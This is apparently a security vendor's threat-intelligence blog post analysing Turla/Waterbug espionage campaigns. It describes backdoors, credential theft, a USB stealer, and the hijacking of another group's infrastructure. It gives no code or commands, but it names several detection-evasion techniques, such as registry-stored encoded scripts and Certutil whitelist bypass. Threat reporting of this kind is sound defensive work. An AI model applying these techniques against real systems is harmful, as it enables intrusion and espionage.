The Waterbug espionage group (aka Turla) has continued to attack governments and international organizations over the past eighteen months in a series of campaigns that have featured a rapidly evolving toolset and, in one notable instance, the apparent hijacking of another espionage group’s infrastructure.
Three waves of attacks
Recent Waterbug activity can be divided into three distinct campaigns, characterized by differing toolsets. One campaign involved a new and previously unseen backdoor called Neptun (Backdoor.Whisperer). Neptun is installed on Microsoft Exchange servers and is designed to passively listen for commands from the attackers. This passive listening capability makes the malware more difficult to detect. Neptun is also able to download additional tools, upload stolen files, and execute shell commands. One attack during this campaign involved the use of infrastructure belonging to another espionage group known as Crambus (aka OilRig, APT34).
A second campaign used Meterpreter, a publicly available backdoor along with two custom loaders, a custom backdoor called photobased.dll, and a custom Remote Procedure Call (RPC) backdoor. Waterbug has been using Meterpreter since at least early 2018 and, in this campaign, used a modified version of Meterpreter, which was encoded and given a .wav extension in order to disguise its true purpose.
The third campaign deployed a different custom RPC backdoor to that used in the second campaign. This backdoor used code derived from the publicly available PowerShellRunner tool to execute PowerShell scripts without using powershell.exe. This tool is designed to bypass detection aimed at identifying malicious PowerShell usage. Prior to execution, the PowerShell scripts were stored Base64-encoded in the registry. This was probably done to avoid them being written to the file system.
Waterbug’s most recent campaigns have involved a swath of new tools including custom malware, modified versions of publicly available hacking tools, and legitimate administration tools. The group has also followed the current shift towards “living off the land,” making use of PowerShell scripts and PsExec, a Microsoft Sysinternals tool used for executing processes on other systems.
Aside from new tools already mentioned above, Waterbug has also deployed:
- A new custom dropper typically used to install Neptun as a service.
- A custom hacking tool that combines four leaked Equation Group tools (EternalBlue, EternalRomance, DoublePulsar, SMBTouch) into a single executable.
- A USB data collecting tool that checks for a connected USB drive and steals certain file types, encrypting them into a RAR file. It then uses WebDAV to upload to a Box cloud drive.
- Visual Basic scripts that perform system reconnaissance after initial infection and then send information to Waterbug command and control (C&C) servers.
- PowerShell scripts that perform system reconnaissance and credential theft from Windows Credential Manager and then send this information back to Waterbug C&Cs.
- Publicly available tools such as IntelliAdmin to execute RPC commands, SScan and NBTScan for network reconnaissance, PsExec for execution and lateral movement, and Mimikatz (Hacktool.Mimikatz) for credential theft, and Certutil.exe to download and decode remote files. These tools were identified being downloaded via Waterbug tools or infrastructure.
These three recent Waterbug campaigns have seen the group compromise governments and international organizations across the globe in addition to targets in the IT and education sectors. Since early 2018, Waterbug has attacked 13 organizations across 10 different countries:
- The Ministry of Foreign Affairs of a Latin American country
- The Ministry of Foreign Affairs of a Middle Eastern country
- The Ministry of Foreign Affairs of a European country
- The Ministry of the Interior of a South Asian country
- Two unidentified government organizations in a Middle Eastern country
- One unidentified government organization in a Southeast Asian country
- A government office of a South Asian country based in another country
- An information and communications technology organization in a Middle Eastern country
- Two information and communications technology organizations in two European countries
- An information and communications technology organization in a South Asian country
- A multinational organization in a Middle Eastern country
- An educational institution in a South Asian country
One of the most interesting things to occur during one of Waterbug’s recent campaigns was that during an attack against one target in the Middle East, Waterbug appeared to hijack infrastructure from the Crambus espionage group and used it to deliver malware on to the victim’s network. Press reports have linked Crambus and Waterbug to different nation states. While it is possible that the two groups may have been collaborating, Symantec has found no further evidence to support this. In all likelihood, Waterbug’s use of Crambus infrastructure appears to have been a hostile takeover. Curiously though, Waterbug also compromised other computers on the victim’s network using its own infrastructure.
During this attack, a customized variant of the publicly available hacking tool Mimikatz was downloaded to a computer on the victim’s network from known Crambus-controlled network infrastructure. Mimikatz was downloaded via the Powruner tool and the Poison Frog control panel. Both the infrastructure and the Powruner tool have been publicly tied to Crambus by a number of vendors. Both were also mentioned in recent leaks of documents tied to Crambus.
Symantec believes that the variant of Mimikatz used in this attack is unique to Waterbug. It was heavily modified, with almost all original code stripped out aside from its sekurlsa::logonpasswords credential stealing feature. Waterbug has frequently made extensive modifications to publicly available tools, something Crambus is not well known for.
The variant of Mimikatz used was packed with a custom packing routine that has not been seen before in any non-Waterbug malware. Waterbug used this same packer on a second custom variant of Mimikatz and on a dropper for the group’s custom Neuron service (Trojan.Cadanif). Its use in the dropper leads us to conclude that this custom packer is exclusively used by Waterbug. Additionally, this version of Mimikatz was compiled using Visual Studio and the publicly available bzip2 library which, although not unique, has been used by other Waterbug tools previously.
Aside from the attack involving Crambus infrastructure, this sample of Mimikatz has only been seen used in one other attack, against an education target in the UK in 2017. On that occasion, Mimikatz was dropped by a known Waterbug tool.
In the case of the attack against the Middle Eastern target, Crambus was the first group to compromise the victim’s network, with the earliest evidence of activity dating to November 2017. The first observed evidence of Waterbug activity came on January 11, 2018, when a Waterbug-linked tool (a task scheduler named msfgi.exe) was dropped on to a computer on the victim’s network. The next day, January 12, the aforementioned variant of Mimikatz was downloaded to the same computer from a known Crambus C&C server. Two further computers on the victim’s network were compromised with Waterbug tools on January 12, but there is no evidence that Crambus infrastructure was used in these attacks. While one of these computers had been previously compromised by Crambus, the other showed no signs of Crambus intrusion.
Waterbug’s intrusions on the victim’s network continued for much of 2018. On September 5, 2018, a similar Mimikatz variant was dropped by Waterbug’s Neptun backdoor onto another computer on the network. At around the same time, other Waterbug malware was seen on the victim’s network which communicated with known Waterbug C&C servers.
Finally, the issue was clouded further by the appearance of a legitimate systems administration tool called IntelliAdmin on the victim’s network. This tool is known to have been used by Crambus and was mentioned in the leak of Crambus documents. However, in this case, IntelliAdmin was dropped by custom Waterbug backdoors, including the newly identified Neptun backdoor, on computers that had not been affected by the Crambus compromise.
The incident leaves many unanswered questions, chiefly relating to Waterbug’s motive for using Crambus infrastructure. There are several possibilities:
- False flag: Waterbug does have a track record of using false flag tactics to throw investigators off the scent. However, if this was a genuine attempt at a false flag operation, it begs the question of why it also used its own infrastructure to communicate with other machines on the victim’s network, in addition to using tools that could be traced back to Waterbug.
- Means of intrusion: It is possible that Waterbug wanted to compromise the target organization, found out that Crambus had already compromised its network, and hijacked Crambus’s own infrastructure as a means of gaining access. Symantec did not observe the initial access point and the close timeframe between Waterbug observed activity on the victim’s network and its observed use of Crambus infrastructure suggests that Waterbug may have used the Crambus infrastructure as an initial access point.
- Mimikatz variant belonged to Crambus: There is a possibility that the version of Mimikatz downloaded by the Crambus infrastructure was actually developed by Crambus. However, the compilation technique and the fact that the only other occasion it was used was linked to Waterbug works against this hypothesis. The fact that Waterbug also appeared on the victim’s network around the same time this version of Mimikatz was downloaded would make it an unlikely coincidence if the tool did belong to Crambus.
- Opportunistic sowing of confusion: If a false flag operation wasn’t planned from the start, it is possible that Waterbug discovered the Crambus intrusion while preparing its attack and opportunistically used it in the hopes of sowing some confusion in the mind of the victim or investigators. Based on recent leaks of Crambus internal documents, its Poison Frog control panel is known to be vulnerable to compromise, meaning it may have been a relatively trivial diversion on the part of Waterbug to hijack Crambus’s infrastructure. A compromise conducted by one threat actor group through another's infrastructure, or fourth party collections, has been previously discussed in a 2017 white paper by Kaspersky researchers.
Waterbug has also mounted two other campaigns over the past year, each of which was characterized by separate tools. These campaigns were wide ranging, hitting targets in Europe, Latin America, and South Asia.
In the first campaign, Waterbug used two versions of a custom loader named javavs.exe (64-bit) and javaws.exe (32-bit), to load a custom backdoor named PhotoBased.dll and run the export function GetUpdate on the victim’s computers. The backdoor will modify the registry for the Windows Media Player to store its C&C configuration. It also reconfigures the Microsoft Sysinternals registry to prevent pop-ups when running the PsExec tool. The backdoor has the capability to download and upload files, execute shell commands, and update its configuration.
The javaws.exe loader is also used to run another loader named tasklistw.exe. This is used by the attackers to decode and execute a series of malicious executables that download Meterpreter to the infected computer.
The attackers also install another backdoor that runs a command shell via the named pipe cmd_pipe. Both backdoors allow the attackers to execute various commands that provide full control of the victim’s system. Waterbug also used an older version of PowerShell, likely to avoid logging.
In the second campaign, Waterbug used an entirely different backdoor, named securlsa.chk. This backdoor can receive commands through the RPC protocol. Its capabilities include:
- Executing commands through cmd.exe with the output redirected into a temporary file
- Reading the command output contained in the temporary file
- Reading or writing arbitrary files
This RPC backdoor also included source code derived from the tool PowerShellRunner, which allows a user to run PowerShell scripts without executing powershell.exe, therefore the user may bypass detection aimed at identifying malicious PowerShell usage.
While both campaigns involved distinct tools during the initial compromise phase, there were also many similarities. Both were characterized by the use of a combination of custom malware and publicly available tools. Also, during both campaigns Waterbug executed multiple payloads nearly simultaneously, most likely to ensure overlapping access to the network if defenders found and removed one of the backdoors.
Waterbug took several steps to avoid detection. It named Meterpreter as a WAV file type, probably in the hope that this would not raise suspicions. The group also used GitHub as a repository for tools that it downloaded post-compromise. This too was likely motivated by a desire to evade detection, since GitHub is a widely trusted website. It used Certutil.exe to download files from the repository, which is an application whitelist bypass technique for remote downloads.
In one of these campaigns, Waterbug used a USB stealer that scans removable storage devices to identify and collect files of interest. It then packages stolen files into a password-protected RAR archive. The malware then uses WebDAV to upload the RAR archive to a Box account.
This is the first time Symantec has observed one targeted attack group seemingly hijack and use the infrastructure of another group. However, it is still difficult to ascertain the motive behind the attack. Whether Waterbug simply seized the opportunity to create confusion about the attack or whether there was more strategic thinking involved remains unknown.
Waterbug’s ever-changing toolset demonstrates a high degree of adaptability by a group determined to avoid detection by staying one step ahead of its targets. Frequent retooling and a penchant for flirting with false flag tactics have made this group one of the most challenging adversaries on the targeted attack landscape.
Symantec has the following protection in place to protect customers against these attacks:
The DeepSight Managed Adversary and Threat Intelligence (MATI) team co-authored this blog and its customers have received intelligence with additional details about these campaigns, the characteristics of the Waterbug (aka Turla) cyber espionage group, and methods of detecting and thwarting activities of this adversary.
Indicators of Compromise